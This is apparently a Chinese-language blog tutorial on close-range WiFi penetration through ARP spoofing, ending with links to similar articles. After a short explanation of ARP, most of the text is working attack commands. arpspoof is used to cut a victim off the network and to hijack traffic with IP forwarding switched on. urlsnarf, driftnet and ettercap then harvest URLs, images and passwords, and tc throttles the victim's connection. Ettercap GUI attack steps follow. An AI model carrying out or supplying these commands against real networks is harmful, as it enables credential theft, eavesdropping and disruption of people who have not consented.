WIFI下的近源渗透

ARP攻击

ARP

ARP协议规定,每台计算机都需要一个ARP表,用来保存IP地址和MAC地址的映射关系 。访问IP地址的时候就去查ARP表,从而找到对应的MAC地址。

如果ARP表中匹配不到,就会使用广播的方式发送一个ARP请求 ,目标主机收到请求后会使用单播的方式返回一个ARP响应,告知自己的MAC地址 。

拿到MAC地址后,会将映射关系缓存到ARP表,而后传递到数据链路层进行解析转换。

arpspoof

arpspoof是一个好用的ARP欺骗工具,攻击者通过毒化受害者ARP缓存,将网关MAC替换为攻击者MAC,然后攻击者可截获受害者发送和收到的数据包,从而获取受害者账户、密码等相关敏感信息。Kali linux中自带了该工具

1
2
3
4
5
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i:指定网卡
-c:攻击机的IP
-t 目标机器的IP
-r:网关IP

断网攻击

1
2
3
4
arpspoof -i eth0 -r 192.168.0.1 -t 192.168.0.121
-i:指定网卡
-r:指定网关ip
-t:指定靶机ip

流量劫持

1
2
3
4
5
6
7
8
1.查看当前是否开启了端口转发
cat /proc/sys/net/ipv4/ip_forward 

2.开启通信转发的命令
echo 1 >> /proc/sys/net/ipv4/ip_forward

3.使用arpspoof发起ARP攻击
arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.11

配合wireshark流量过滤

配合urlsnarf进行流量分析

1
urlsnarf -i eth0

driftnet图片窃取

1
driftnet -i eth0 -a -d /root/pcixxx

配合ettercap监听密码 监听eth0网卡流量

1
ettercap -Tq -i eth0

配合tc网络限速

1
2
3
4
5
6
7
8
9
10
11
12
13
14
1.限制网速200ms延时
tc qdisc add dev eth0 root netem delay 200ms

2.取消限制网速200ms延时
tc qdisc del dev eth0 root netem delay 200ms

3.修改网络延时
tc qdisc change  dev eth0 root netem delay 300ms

查看限速规则
tc qdisc show

查看靶机当前的网速
https://www.speedtest.cn/

ettercap

启动ettercap GUI

1
ettercap -G

扫描

开启扫描

查看主机列表

查看主机列表

网关add target1

将网关加入目标1

目标机器 add target2

将靶机加入到目标2

选择arp攻击

选择ARP攻击

发起攻击

点击ok发起攻击

refer:

https://www.wangan.com/p/7fy7fg41f40d565f

https://blog.seanzou.com/archives/-wang-an--fu-xian-wifi-shen-tou--jin-yuan-shen-tou-

https://wooyun.js.org/drops/WIFI%E6%B8%97%E9%80%8F%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E7%B2%BE%E9%80%9A.html

https://www.freebuf.com/articles/wireless/283395.html

https://9bie.org/index.php/archives/869/

https://tttang.com/archive/1888/

__END__